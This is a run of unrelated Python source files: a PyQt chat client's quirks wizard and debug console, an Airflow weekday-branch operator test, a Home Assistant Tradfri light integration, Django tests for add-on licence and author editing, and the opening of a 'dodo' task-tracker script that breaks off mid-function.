self.setWindowTitle('Quirks') self.setWindowIcon(QIcon(app.theme["path"] + "/trayicon.png")) enableNext = lambda: self.nextButton.setEnabled(True) self.nextButton.setEnabled(False) self.prefixRadio.clicked.connect(enableNext) self.suffixRadio.clicked.connect(enableNext) self.replaceRadio.clicked.connect(enableNext) self.regexRadio.clicked.connect(enableNext) self.randomRadio.clicked.connect(enableNext) self.nextButton.clicked.connect(self.next) self.nextButton_2.clicked.connect(self.next) self.nextButton_3.clicked.connect(self.next) self.nextButton_4.clicked.connect(self.next) self.nextButton_5.clicked.connect(self.next) self.nextButton_6.clicked.connect(self.next) self.backButton.clicked.connect(self.back) self.backButton_2.clicked.connect(self.back) self.backButton_3.clicked.connect(self.back) self.backButton_4.clicked.connect(self.back) self.backButton_5.clicked.connect(self.back) self.backButton_6.clicked.connect(self.back) self.cancelButton.clicked.connect(self.close) self.cancelButton_2.clicked.connect(self.close) self.cancelButton_3.clicked.connect(self.close) self.cancelButton_4.clicked.connect(self.close) self.cancelButton_5.clicked.connect(self.close) self.cancelButton_6.clicked.connect(self.close) self.addRandomButton.clicked.connect(self.addRandom) self.removeRandomButton.clicked.connect(self.removeRandom) self.reloadFuncs.clicked.connect(self.reload_functions) self.randReloadFuncs.clicked.connect(self.rand_reload_functions) self.randomRegex = list() self.show() def back(self): self.stackWidget.setCurrentIndex(0) def next(self): index = self.stackWidget.currentIndex() if index == 0: if self.prefixRadio.isChecked(): self.stackWidget.setCurrentIndex(1) elif self.suffixRadio.isChecked(): self.stackWidget.setCurrentIndex(2) elif self.replaceRadio.isChecked(): self.stackWidget.setCurrentIndex(3) elif self.regexRadio.isChecked(): self.stackWidget.setCurrentIndex(4) self.addFuncs() elif self.randomRadio.isChecked(): self.stackWidget.setCurrentIndex(5) self.randAddFuncs() elif index == 1: value = self.prefixLineEdit.text() self.app.quirks.append(("prefix", value,)) elif index == 2: value = self.suffixLineEdit.text() self.app.quirks.append(("suffix", value,)) elif index == 3: value = (self.replaceReplaceLineEdit.text(), self.replaceWithLineEdit.text()) self.app.quirks.append(("replace", value,)) elif index == 4: replace = self.regexpReplaceLineEdit.text() fm = self.regexpLineEdit.text() if not ("(" in fm and ")" in fm): fm = "({})".format(fm) value = (fm, replace) self.app.quirks.append(("regex", value,)) elif index == 5: fm = self.randomRegexpLineEdit.text() if not ("(" in fm and ")" in fm): fm = "({})".format(fm) value = (fm, tuple(self.randomRegex)) self.app.quirks.append(("random", value,)) if index != 0: self.parent.quirksList.addItem("{}:{}".format(self.buttons[index], value)) self.close() def addRandom(self): nq = self.addRandomLineEdit.text() self.randomList.addItem(nq) self.randomRegex.append(nq) self.addRandomLineEdit.setText("") def removeRandom(self): items = self.randomList.selectedItems() for item in items: self.randomRegex.remove(item.text()) self.randomList.takeItem(self.randomList.indexFromItem(item).row()) def randAddFuncs(self): for func in self.app.quirks.qfuncs.values(): self.randRegexFuncs.addItem(func.__name__ + "()") def addFuncs(self): for func in self.app.quirks.qfuncs.values(): self.regexFuncs.addItem(func.__name__ + "()") def reload_functions(self): self.regexFuncs.reset() self.app.quirks.reload() self.addFuncs() def rand_reload_functions(self): self.randRegexFuncs.reset() self.app.quirks.reload() self.addFuncs() class ConnectingDialog(QDialog): def __init__(self, app, parent): super(__class__, self).__init__() uic.loadUi(app.theme["ui_path"] + "/ConnectingDialog.ui", self) self.app = app self.parent = parent self.app.connectingDialog = self self.setWindowFlags(Qt.FramelessWindowHint) self.connectingExitButton.clicked.connect(sysexit) self.setWindowTitle('Connecting') self.setWindowIcon(QIcon(app.theme["path"] + "/trayicon.png")) self.app.connectingDialog = self width = self.frameGeometry().width() height = self.frameGeometry().height() self.setFixedSize(width, height) # Methods for moving window @pyqtSlot() def mousePressEvent(self, event): self.offset = event.pos() @pyqtSlot() def mouseMoveEvent(self, event): x = event.globalX() y = event.globalY() x_w = self.offset.x() y_w = self.offset.y() self.move(x - x_w, y - y_w) class InteractiveConsole(QWidget): def __init__(self, app): super(__class__, self).__init__() uic.loadUi(app.theme["ui_path"] + "/PrivateMessageWidget.ui", self) self.app = app self.userLabel.setText("::DEBUG::") self.setWindowTitle("Debug") self.setWindowIcon(QIcon("resources/sburb.png")) self.sendButton.clicked.connect(self.send) self.sendButton.setText("GO!") self.userOutput.setReadOnly(True) self.userOutput.setMouseTracking(True) self.show() def send(self): msg = self.userInput.text() if msg: self.display_text(">>> {}\n".format(msg)) ensure_future(self.run(msg)) self.userInput.setText("") def display_text(self, msg): if not msg.endswith("\n"): msg += "\n" cursor = self.userOutput.textCursor() cursor.movePosition(QTextCursor.End) self.userOutput.setTextCursor(cursor) self.userOutput.insertPlainText(msg) def keyPressEvent(self, event): if event.key() == Qt.Key_Return: self.send() def get_syntax_error(self, e): return '{0.text}{1:>{0.offset}}\n{2}: {0}'.format(e, '^', type(e).__name__) async def run(self, msg): msg = msg.replace("\\n", "\n") app = self.app client = self.app.client gui = self.app.gui executor = exec if msg.count('\n') == 0: # single statement, potentially 'eval' try: code = compile(msg, '<repl>', 'eval') except SyntaxError: pass else: executor = eval if executor is exec: try: code = compile(msg, '<repl>', 'exec') except SyntaxError as e: self.display_text(self.get_syntax_error(e)) return fmt = None stdout = StringIO() try: with redirect_stdout(stdout): result = executor(code) if isawaitable(result): result = await result except Exception as e: value = stdout.getvalue() fmt = '{}{}'.format(value, format_exc()) else: value = stdout.getvalue() if result is not None: fmt = '{}{}'.format(value, result) elif value: fmt = '{}'.format(value) if fmt is not None: if len(fmt) > 2000: self.display_text('Content too big to be printed.') else: self.display_text(fmt)
# # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. import datetime import unittest import pytest from freezegun import freeze_time from parameterized import parameterized from airflow.exceptions import AirflowException from airflow.models import DAG, DagRun, TaskInstance as TI from airflow.operators.dummy import DummyOperator from airflow.operators.weekday import BranchDayOfWeekOperator from airflow.utils import timezone from airflow.utils.session import create_session from airflow.utils.state import State from airflow.utils.weekday import WeekDay DEFAULT_DATE = timezone.datetime(2020, 2, 5) # Wednesday INTERVAL = datetime.timedelta(hours=12) class TestBranchDayOfWeekOperator(unittest.TestCase): """ Tests for BranchDayOfWeekOperator """ @classmethod def setUpClass(cls): with create_session() as session: session.query(DagRun).delete() session.query(TI).delete() def setUp(self): self.dag = DAG( "branch_day_of_week_operator_test", start_date=DEFAULT_DATE, schedule_interval=INTERVAL, ) self.branch_1 = DummyOperator(task_id="branch_1", dag=self.dag) self.branch_2 = DummyOperator(task_id="branch_2", dag=self.dag) self.branch_3 = None def tearDown(self): with create_session() as session: session.query(DagRun).delete() session.query(TI).delete() def _assert_task_ids_match_states(self, dr, task_ids_to_states): """Helper that asserts task instances with a given id are in a given state""" tis = dr.get_task_instances() for ti in tis: try: expected_state = task_ids_to_states[ti.task_id] except KeyError: raise ValueError(f'Invalid task id {ti.task_id} found!') else: self.assertEqual( ti.state, expected_state, f"Task {ti.task_id} has state {ti.state} instead of expected {expected_state}", ) @parameterized.expand( [ ("with-string", "Monday"), ("with-enum", WeekDay.MONDAY), ("with-enum-set", {WeekDay.MONDAY}), ("with-enum-set-2-items", {WeekDay.MONDAY, WeekDay.FRIDAY}), ("with-string-set", {"Monday"}), ("with-string-set-2-items", {"Monday", "Friday"}), ] ) @freeze_time("2021-01-25") # Monday def test_branch_follow_true(self, _, weekday): """Checks if BranchDayOfWeekOperator follows true branch""" print(datetime.datetime.now()) branch_op = BranchDayOfWeekOperator( task_id="make_choice", follow_task_ids_if_true=["branch_1", "branch_2"], follow_task_ids_if_false="branch_3", week_day=weekday, dag=self.dag, ) self.branch_1.set_upstream(branch_op) self.branch_2.set_upstream(branch_op) self.branch_3 = DummyOperator(task_id="branch_3", dag=self.dag) self.branch_3.set_upstream(branch_op) self.dag.clear() dr = self.dag.create_dagrun( run_id="manual__", start_date=timezone.utcnow(), execution_date=DEFAULT_DATE, state=State.RUNNING, ) branch_op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE) self._assert_task_ids_match_states( dr, { 'make_choice': State.SUCCESS, 'branch_1': State.NONE, 'branch_2': State.NONE, 'branch_3': State.SKIPPED, }, ) @freeze_time("2021-01-25") # Monday def test_branch_follow_true_with_execution_date(self): """Checks if BranchDayOfWeekOperator follows true branch when set use_task_execution_day""" branch_op = BranchDayOfWeekOperator( task_id="make_choice", follow_task_ids_if_true="branch_1", follow_task_ids_if_false="branch_2", week_day="Wednesday", use_task_execution_day=True, # We compare to DEFAULT_DATE which is Wednesday dag=self.dag, ) self.branch_1.set_upstream(branch_op) self.branch_2.set_upstream(branch_op) self.dag.clear() dr = self.dag.create_dagrun( run_id="manual__", start_date=timezone.utcnow(), execution_date=DEFAULT_DATE, state=State.RUNNING, ) branch_op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE) self._assert_task_ids_match_states( dr, { 'make_choice': State.SUCCESS, 'branch_1': State.NONE, 'branch_2': State.SKIPPED, }, ) @freeze_time("2021-01-25") # Monday def test_branch_follow_false(self): """Checks if BranchDayOfWeekOperator follow false branch""" branch_op = BranchDayOfWeekOperator( task_id="make_choice", follow_task_ids_if_true="branch_1", follow_task_ids_if_false="branch_2", week_day="Sunday", dag=self.dag, ) self.branch_1.set_upstream(branch_op) self.branch_2.set_upstream(branch_op) self.dag.clear() dr = self.dag.create_dagrun( run_id="manual__", start_date=timezone.utcnow(), execution_date=DEFAULT_DATE, state=State.RUNNING, ) branch_op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE) self._assert_task_ids_match_states( dr, { 'make_choice': State.SUCCESS, 'branch_1': State.SKIPPED, 'branch_2': State.NONE, }, ) def test_branch_with_no_weekday(self): """Check if BranchDayOfWeekOperator raises exception on missing weekday""" with self.assertRaises(AirflowException): BranchDayOfWeekOperator( # pylint: disable=missing-kwoa task_id="make_choice", follow_task_ids_if_true="branch_1", follow_task_ids_if_false="branch_2", dag=self.dag, ) def test_branch_with_invalid_type(self): """Check if BranchDayOfWeekOperator raises exception on unsupported weekday type""" invalid_week_day = ['Monday'] with pytest.raises( TypeError, match='Unsupported Type for week_day parameter:' ' {}. It should be one of str, set or ' 'Weekday enum type'.format(type(invalid_week_day)), ): BranchDayOfWeekOperator( task_id="make_choice", follow_task_ids_if_true="branch_1", follow_task_ids_if_false="branch_2", week_day=invalid_week_day, dag=self.dag, ) def test_weekday_branch_invalid_weekday_number(self): """Check if BranchDayOfWeekOperator raises exception on wrong value of weekday""" invalid_week_day = 'Thsday' with pytest.raises(AttributeError, match=f'Invalid Week Day passed: "{invalid_week_day}"'): BranchDayOfWeekOperator( task_id="make_choice", follow_task_ids_if_true="branch_1", follow_task_ids_if_false="branch_2", week_day=invalid_week_day, dag=self.dag, ) @freeze_time("2021-01-25") # Monday def test_branch_xcom_push_true_branch(self): """Check if BranchDayOfWeekOperator push to xcom value of follow_task_ids_if_true""" branch_op = BranchDayOfWeekOperator( task_id="make_choice", follow_task_ids_if_true="branch_1", follow_task_ids_if_false="branch_2", week_day="Monday", dag=self.dag, ) self.branch_1.set_upstream(branch_op) self.branch_2.set_upstream(branch_op) self.dag.clear() dr = self.dag.create_dagrun( run_id="manual__", start_date=timezone.utcnow(), execution_date=DEFAULT_DATE, state=State.RUNNING, ) branch_op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE) tis = dr.get_task_instances() for ti in tis: if ti.task_id == 'make_choice': assert ti.xcom_pull(task_ids='make_choice') == 'branch_1'
"""Support for IKEA Tradfri lights.""" from __future__ import annotations from collections.abc import Callable from typing import Any, cast from pytradfri.command import Command from pytradfri.group import Group from homeassistant.components.light import ( ATTR_BRIGHTNESS, ATTR_COLOR_TEMP, ATTR_HS_COLOR, ATTR_TRANSITION, SUPPORT_BRIGHTNESS, SUPPORT_COLOR, SUPPORT_COLOR_TEMP, LightEntity, ) from homeassistant.config_entries import ConfigEntry from homeassistant.core import HomeAssistant from homeassistant.helpers.entity_platform import AddEntitiesCallback from homeassistant.helpers.update_coordinator import CoordinatorEntity import homeassistant.util.color as color_util from .base_class import TradfriBaseEntity from .const import ( ATTR_DIMMER, ATTR_HUE, ATTR_SAT, ATTR_TRANSITION_TIME, CONF_GATEWAY_ID, CONF_IMPORT_GROUPS, COORDINATOR, COORDINATOR_LIST, DOMAIN, GROUPS_LIST, KEY_API, SUPPORTED_GROUP_FEATURES, SUPPORTED_LIGHT_FEATURES, ) from .coordinator import ( TradfriDeviceDataUpdateCoordinator, TradfriGroupDataUpdateCoordinator, ) async def async_setup_entry( hass: HomeAssistant, config_entry: ConfigEntry, async_add_entities: AddEntitiesCallback, ) -> None: """Load Tradfri lights based on a config entry.""" gateway_id = config_entry.data[CONF_GATEWAY_ID] coordinator_data = hass.data[DOMAIN][config_entry.entry_id][COORDINATOR] api = coordinator_data[KEY_API] entities: list = [ TradfriLight( device_coordinator, api, gateway_id, ) for device_coordinator in coordinator_data[COORDINATOR_LIST] if device_coordinator.device.has_light_control ] if config_entry.data[CONF_IMPORT_GROUPS] and ( group_coordinators := coordinator_data[GROUPS_LIST] ): entities.extend( [ TradfriGroup(group_coordinator, api, gateway_id) for group_coordinator in group_coordinators ] ) async_add_entities(entities) class TradfriGroup(CoordinatorEntity, LightEntity): """The platform class for light groups required by hass.""" _attr_supported_features = SUPPORTED_GROUP_FEATURES def __init__( self, group_coordinator: TradfriGroupDataUpdateCoordinator, api: Callable[[Command | list[Command]], Any], gateway_id: str, ) -> None: """Initialize a Group.""" super().__init__(coordinator=group_coordinator) self._group: Group = self.coordinator.data self._api = api self._attr_unique_id = f"group-{gateway_id}-{self._group.id}" @property def is_on(self) -> bool: """Return true if group lights are on.""" return cast(bool, self._group.state) @property def brightness(self) -> int | None: """Return the brightness of the group lights.""" return cast(int, self._group.dimmer) async def async_turn_off(self, **kwargs: Any) -> None: """Instruct the group lights to turn off.""" await self._api(self._group.set_state(0)) await self.coordinator.async_request_refresh() async def async_turn_on(self, **kwargs: Any) -> None: """Instruct the group lights to turn on, or dim.""" keys = {} if ATTR_TRANSITION in kwargs: keys["transition_time"] = int(kwargs[ATTR_TRANSITION]) * 10 if ATTR_BRIGHTNESS in kwargs: if kwargs[ATTR_BRIGHTNESS] == 255: kwargs[ATTR_BRIGHTNESS] = 254 await self._api(self._group.set_dimmer(kwargs[ATTR_BRIGHTNESS], **keys)) else: await self._api(self._group.set_state(1)) await self.coordinator.async_request_refresh() class TradfriLight(TradfriBaseEntity, LightEntity): """The platform class required by Home Assistant.""" def __init__( self, device_coordinator: TradfriDeviceDataUpdateCoordinator, api: Callable[[Command | list[Command]], Any], gateway_id: str, ) -> None: """Initialize a Light.""" super().__init__( device_coordinator=device_coordinator, api=api, gateway_id=gateway_id, ) self._device_control = self._device.light_control self._device_data = self._device_control.lights[0] self._attr_unique_id = f"light-{gateway_id}-{self._device_id}" self._hs_color = None # Calculate supported features _features = SUPPORTED_LIGHT_FEATURES if self._device.light_control.can_set_dimmer: _features |= SUPPORT_BRIGHTNESS if self._device.light_control.can_set_color: _features |= SUPPORT_COLOR | SUPPORT_COLOR_TEMP if self._device.light_control.can_set_temp: _features |= SUPPORT_COLOR_TEMP self._attr_supported_features = _features if self._device_control: self._attr_min_mireds = self._device_control.min_mireds self._attr_max_mireds = self._device_control.max_mireds def _refresh(self) -> None: """Refresh the device.""" self._device_data = self.coordinator.data.light_control.lights[0] @property def is_on(self) -> bool: """Return true if light is on.""" if not self._device_data: return False return cast(bool, self._device_data.state) @property def brightness(self) -> int | None: """Return the brightness of the light.""" if not self._device_data: return None return cast(int, self._device_data.dimmer) @property def color_temp(self) -> int | None: """Return the color temp value in mireds.""" if not self._device_data: return None return cast(int, self._device_data.color_temp) @property def hs_color(self) -> tuple[float, float] | None: """HS color of the light.""" if not self._device_control or not self._device_data: return None if self._device_control.can_set_color: hsbxy = self._device_data.hsb_xy_color hue = hsbxy[0] / (self._device_control.max_hue / 360) sat = hsbxy[1] / (self._device_control.max_saturation / 100) if hue is not None and sat is not None: return hue, sat return None async def async_turn_off(self, **kwargs: Any) -> None: """Instruct the light to turn off.""" # This allows transitioning to off, but resets the brightness # to 1 for the next set_state(True) command if not self._device_control: return transition_time = None if ATTR_TRANSITION in kwargs: transition_time = int(kwargs[ATTR_TRANSITION]) * 10 dimmer_data = {ATTR_DIMMER: 0, ATTR_TRANSITION_TIME: transition_time} await self._api(self._device_control.set_dimmer(**dimmer_data)) else: await self._api(self._device_control.set_state(False)) async def async_turn_on(self, **kwargs: Any) -> None: """Instruct the light to turn on.""" if not self._device_control: return transition_time = None if ATTR_TRANSITION in kwargs: transition_time = int(kwargs[ATTR_TRANSITION]) * 10 dimmer_command = None if ATTR_BRIGHTNESS in kwargs: brightness = kwargs[ATTR_BRIGHTNESS] brightness = min(brightness, 254) dimmer_data = { ATTR_DIMMER: brightness, ATTR_TRANSITION_TIME: transition_time, } dimmer_command = self._device_control.set_dimmer(**dimmer_data) transition_time = None else: dimmer_command = self._device_control.set_state(True) color_command = None if ATTR_HS_COLOR in kwargs and self._device_control.can_set_color: hue = int(kwargs[ATTR_HS_COLOR][0] * (self._device_control.max_hue / 360)) sat = int( kwargs[ATTR_HS_COLOR][1] * (self._device_control.max_saturation / 100) ) color_data = { ATTR_HUE: hue, ATTR_SAT: sat, ATTR_TRANSITION_TIME: transition_time, } color_command = self._device_control.set_hsb(**color_data) transition_time = None temp_command = None if ATTR_COLOR_TEMP in kwargs and ( self._device_control.can_set_temp or self._device_control.can_set_color ): temp = kwargs[ATTR_COLOR_TEMP] # White Spectrum bulb if self._device_control.can_set_temp: if temp > self.max_mireds: temp = self.max_mireds elif temp < self.min_mireds: temp = self.min_mireds temp_data = { ATTR_COLOR_TEMP: temp, ATTR_TRANSITION_TIME: transition_time, } temp_command = self._device_control.set_color_temp(**temp_data) transition_time = None # Color bulb (CWS) # color_temp needs to be set with hue/saturation elif self._device_control.can_set_color: temp_k = color_util.color_temperature_mired_to_kelvin(temp) hs_color = color_util.color_temperature_to_hs(temp_k) hue = int(hs_color[0] * (self._device_control.max_hue / 360)) sat = int(hs_color[1] * (self._device_control.max_saturation / 100)) color_data = { ATTR_HUE: hue, ATTR_SAT: sat, ATTR_TRANSITION_TIME: transition_time, } color_command = self._device_control.set_hsb(**color_data) transition_time = None # HSB can always be set, but color temp + brightness is bulb dependent if (command := dimmer_command) is not None: command += color_command else: command = color_command if self._device_control.can_combine_commands: await self._api(command + temp_command) else: if temp_command is not None: await self._api(temp_command) if command is not None: await self._api(command)
"""Tests related to the ``devhub.addons.owner`` view.""" from nose.tools import eq_ from pyquery import PyQuery as pq import waffle import amo import amo.tests from amo.tests import formset from addons.models import Addon, AddonUser from devhub.forms import LicenseForm from devhub.models import ActivityLog from versions.models import License, Version class TestOwnership(amo.tests.TestCase): fixtures = ['base/apps', 'base/users', 'base/addon_3615'] def setUp(self): self.addon = Addon.objects.get(id=3615) self.version = self.addon.current_version self.url = self.addon.get_dev_url('owner') assert self.client.login(username='del@icio.us', password='password') def formset(self, *args, **kw): defaults = {'builtin': License.OTHER, 'text': 'filler'} defaults.update(kw) return formset(*args, **defaults) def get_version(self): return Version.objects.no_cache().get(id=self.version.id) def get_addon(self): return Addon.objects.no_cache().get(id=self.addon.id) class TestEditPolicy(TestOwnership): def formset(self, *args, **kw): init = self.client.get(self.url).context['user_form'].initial_forms args = args + tuple(f.initial for f in init) return super(TestEditPolicy, self).formset(*args, **kw) def test_edit_eula(self): old_eula = self.addon.eula data = self.formset(eula='new eula', has_eula=True) r = self.client.post(self.url, data) eq_(r.status_code, 302) addon = self.get_addon() eq_(unicode(addon.eula), 'new eula') eq_(addon.eula.id, old_eula.id) def test_delete_eula(self): assert self.addon.eula r = self.client.post(self.url, self.formset(has_eula=False)) eq_(r.status_code, 302) eq_(self.get_addon().eula, None) def test_edit_eula_locale(self): self.addon.eula = {'de': 'some eula', 'en-US': ''} self.addon.save() res = self.client.get(self.url.replace('en-US', 'it')) doc = pq(res.content) eq_(doc('#id_has_eula').attr('checked'), 'checked') class TestEditLicense(TestOwnership): def setUp(self): super(TestEditLicense, self).setUp() self.version.license = None self.version.save() self.license = License.objects.create(builtin=1, name='bsd', url='license.url', on_form=True) def formset(self, *args, **kw): init = self.client.get(self.url).context['user_form'].initial_forms args = args + tuple(f.initial for f in init) kw['initial_count'] = len(init) data = super(TestEditLicense, self).formset(*args, **kw) if 'text' not in kw: del data['text'] return data def test_success_add_builtin(self): data = self.formset(builtin=1) r = self.client.post(self.url, data) eq_(r.status_code, 302) eq_(self.license, self.get_version().license) eq_(ActivityLog.objects.filter( action=amo.LOG.CHANGE_LICENSE.id).count(), 1) def test_success_add_custom(self): data = self.formset(builtin=License.OTHER, text='text', name='name') r = self.client.post(self.url, data) eq_(r.status_code, 302) license = self.get_version().license eq_(unicode(license.text), 'text') eq_(unicode(license.name), 'name') eq_(license.builtin, License.OTHER) def test_success_edit_custom(self): data = self.formset(builtin=License.OTHER, text='text', name='name') r = self.client.post(self.url, data) license_one = self.get_version().license data = self.formset(builtin=License.OTHER, text='woo', name='name') r = self.client.post(self.url, data) eq_(r.status_code, 302) license_two = self.get_version().license eq_(unicode(license_two.text), 'woo') eq_(unicode(license_two.name), 'name') eq_(license_two.builtin, License.OTHER) eq_(license_two.id, license_one.id) def test_success_switch_license(self): data = self.formset(builtin=1) r = self.client.post(self.url, data) license_one = self.get_version().license data = self.formset(builtin=License.OTHER, text='text', name='name') r = self.client.post(self.url, data) eq_(r.status_code, 302) license_two = self.get_version().license eq_(unicode(license_two.text), 'text') eq_(unicode(license_two.name), 'name') eq_(license_two.builtin, License.OTHER) assert license_one != license_two # Make sure the old license wasn't edited. license = License.objects.get(builtin=1) eq_(unicode(license.name), 'bsd') data = self.formset(builtin=1) r = self.client.post(self.url, data) eq_(r.status_code, 302) license_three = self.get_version().license eq_(license_three, license_one) def test_custom_has_text(self): data = self.formset(builtin=License.OTHER, name='name') r = self.client.post(self.url, data) eq_(r.status_code, 200) self.assertFormError(r, 'license_form', None, 'License text is required when choosing Other.') def test_custom_has_name(self): data = self.formset(builtin=License.OTHER, text='text') r = self.client.post(self.url, data) eq_(r.status_code, 302) license = self.get_version().license eq_(unicode(license.text), 'text') eq_(unicode(license.name), 'Custom License') eq_(license.builtin, License.OTHER) def test_no_version(self): # Make sure nothing bad happens if there's no version. self.addon.update(_current_version=None) Version.objects.all().delete() data = self.formset(builtin=License.OTHER, text='text') r = self.client.post(self.url, data) eq_(r.status_code, 302) def test_license_details_links(self): # Check that builtin licenses get details links. doc = pq(unicode(LicenseForm(addon=self.version.addon))) for license in License.objects.builtins(): radio = 'input.license[value=%s]' % license.builtin eq_(doc(radio).parent().text(), unicode(license.name) + ' Details') eq_(doc(radio + '+ a').attr('href'), license.url) eq_(doc('input[name=builtin]:last-child').parent().text(), 'Other') def test_license_logs(self): data = self.formset(builtin=License.OTHER, text='text') self.version.files.all().delete() self.version.addon.update(status=amo.STATUS_PUBLIC) self.client.post(self.url, data) eq_(ActivityLog.objects.all().count(), 2) self.version.license = License.objects.all()[1] self.version.save() data = self.formset(builtin=License.OTHER, text='text') self.client.post(self.url, data) eq_(ActivityLog.objects.all().count(), 3) class TestEditAuthor(TestOwnership): def test_reorder_authors(self): """ Re-ordering authors should not generate role changes in the ActivityLog. """ # flip form-0-position f = self.client.get(self.url).context['user_form'].initial_forms[0] u = dict(user='regular@mozilla.com', listed=True, role=amo.AUTHOR_ROLE_DEV, position=0) data = self.formset(f.initial, u, initial_count=1) r = self.client.post(self.url, data) eq_(r.status_code, 302) f = self.client.get(self.url).context['user_form'].initial_forms[0] u1 = f.initial u1['position'] = 1 f = self.client.get(self.url).context['user_form'].initial_forms[1] u2 = f.initial data = self.formset(u1, u2) orig = ActivityLog.objects.all().count() r = self.client.post(self.url, data) self.assertRedirects(r, self.url, 302) eq_(ActivityLog.objects.all().count(), orig) def test_success_add_user(self): q = (AddonUser.objects.no_cache().filter(addon=3615) .values_list('user', flat=True)) eq_(list(q.all()), [55021]) f = self.client.get(self.url).context['user_form'].initial_forms[0] u = dict(user='regular@mozilla.com', listed=True, role=amo.AUTHOR_ROLE_DEV, position=0) data = self.formset(f.initial, u, initial_count=1) r = self.client.post(self.url, data) self.assertRedirects(r, self.url, 302) eq_(list(q.all()), [55021, 999]) def test_success_edit_user(self): # Add an author b/c we can't edit anything about the current one. f = self.client.get(self.url).context['user_form'].initial_forms[0] u = dict(user='regular@mozilla.com', listed=True, role=amo.AUTHOR_ROLE_DEV, position=1) data = self.formset(f.initial, u, initial_count=1) self.client.post(self.url, data) eq_(AddonUser.objects.get(addon=3615, user=999).listed, True) # Edit the user we just added. user_form = self.client.get(self.url).context['user_form'] one, two = user_form.initial_forms del two.initial['listed'] empty = dict(user='', listed=True, role=5, position=0) data = self.formset(one.initial, two.initial, empty, initial_count=2) r = self.client.post(self.url, data) self.assertRedirects(r, self.url, 302) eq_(AddonUser.objects.no_cache().get(addon=3615, user=999).listed, False) def test_add_user_twice(self): f = self.client.get(self.url).context['user_form'].initial_forms[0] u = dict(user='regular@mozilla.com', listed=True, role=amo.AUTHOR_ROLE_DEV, position=1) data = self.formset(f.initial, u, u, initial_count=1) r = self.client.post(self.url, data) eq_(r.status_code, 200) eq_(r.context['user_form'].non_form_errors(), ['An author can only be listed once.']) def test_success_delete_user(self): # Add a new user so we have one to delete. data = self.formset(dict(user='regular@mozilla.com', listed=True, role=amo.AUTHOR_ROLE_OWNER, position=1), initial_count=0) self.client.post(self.url, data) one, two = self.client.get(self.url).context['user_form'].initial_forms one.initial['DELETE'] = True data = self.formset(one.initial, two.initial, initial_count=2) r = self.client.post(self.url, data) eq_(r.status_code, 302) eq_(999, AddonUser.objects.get(addon=3615).user_id) def test_switch_owner(self): # See if we can transfer ownership in one POST. f = self.client.get(self.url).context['user_form'].initial_forms[0] f.initial['user'] = 'regular@mozilla.com' data = self.formset(f.initial, initial_count=1) r = self.client.post(self.url, data) eq_(r.status_code, 302) eq_(999, AddonUser.objects.get(addon=3615).user_id) eq_(ActivityLog.objects.filter( action=amo.LOG.ADD_USER_WITH_ROLE.id).count(), 1) eq_(ActivityLog.objects.filter( action=amo.LOG.REMOVE_USER_WITH_ROLE.id).count(), 1) def test_only_owner_can_edit(self): f = self.client.get(self.url).context['user_form'].initial_forms[0] u = dict(user='regular@mozilla.com', listed=True, role=amo.AUTHOR_ROLE_DEV, position=0) data = self.formset(f.initial, u, initial_count=1) self.client.post(self.url, data) self.client.login(username='regular@mozilla.com', password='password') self.client.post(self.url, data, follow=True) # Try deleting the other AddonUser one, two = self.client.get(self.url).context['user_form'].initial_forms one.initial['DELETE'] = True data = self.formset(one.initial, two.initial, initial_count=2) r = self.client.post(self.url, data, follow=True) eq_(r.status_code, 403) eq_(AddonUser.objects.filter(addon=3615).count(), 2) def test_must_have_listed(self): f = self.client.get(self.url).context['user_form'].initial_forms[0] f.initial['listed'] = False data = self.formset(f.initial, initial_count=1) r = self.client.post(self.url, data) eq_(r.context['user_form'].non_form_errors(), ['At least one author must be listed.']) def test_must_have_owner(self): f = self.client.get(self.url).context['user_form'].initial_forms[0] f.initial['role'] = amo.AUTHOR_ROLE_DEV data = self.formset(f.initial, initial_count=1) r = self.client.post(self.url, data) eq_(r.context['user_form'].non_form_errors(), ['Must have at least one owner.']) def test_must_have_owner_delete(self): f = self.client.get(self.url).context['user_form'].initial_forms[0] f.initial['DELETE'] = True data = self.formset(f.initial, initial_count=1) r = self.client.post(self.url, data) eq_(r.context['user_form'].non_form_errors(), ['Must have at least one owner.'])
#!/usr/bin/env python import argparse import calendar import json import re import time import os import sys from datetime import datetime from time import mktime DODO_FILE = os.path.join(os.getcwd(), 'DODO') VERSION = "0.99" class TerminalColors(object): """ Color class for listing out dodos """ HEADER = '\033[95m' BLUE = '\033[94m' GREEN = '\033[92m' YELLOW = '\033[93m' RED = '\033[91m' BOLD = '\033[1m' UNDERLINE = '\033[4m' END = '\033[0m' def __init__(self): pass statuses = { '+': 'add', '*': 'accepted', '-': 'rejected', '#': 'working', '.': 'complete' } def pretty_date(date_string): timestamp = calendar.timegm((datetime.strptime(date_string, "%d-%m-%y %H:%M")).timetuple()) date = datetime.fromtimestamp(timestamp) diff = datetime.now() - date s = diff.seconds if diff.days > 7 or diff.days < 0: return date.strftime('%d %b %y') elif diff.days == 1: return '1 day ago' elif diff.days > 1: return '{} days ago'.format(diff.days) elif s <= 1: return 'just now' elif s < 60: return '{} seconds ago'.format(s) elif s < 120: return '1 minute ago' elif s < 3600: return '{} minutes ago'.format(s/60) elif s < 7200: return '1 hour ago' else: return '{} hours ago'.format(s/3600) def parse_dodo(line): if line: do_id = re.search("#\d+", line).group()[1:] do_status = re.search(r'\[\[\W+\]\]', line).group()[2:-2] do_time = re.search(r'(<<.+>>)', line) do_description = re.search(r'({{.+}})', line) if do_time: do_time = do_time.group().replace("<<", "").replace(">>", "") do_user = re.search(r'(\(\(.+\)\))', line) if do_user: do_user = do_user.group().replace("((", "").replace("))", "") if do_description: do_description = do_description.group().replace("{{", "").replace("}}", "") return { "id": do_id, "time": do_time, "user": do_user, "status": do_status, "description": do_description } def dodo_load(args): global DODO_FILE do_dict = {} DODO_FILE = args.file or DODO_FILE with open(DODO_FILE, 'r') as file_inst: contents = file_inst.readlines() for content in contents: do_data = parse_dodo(content) 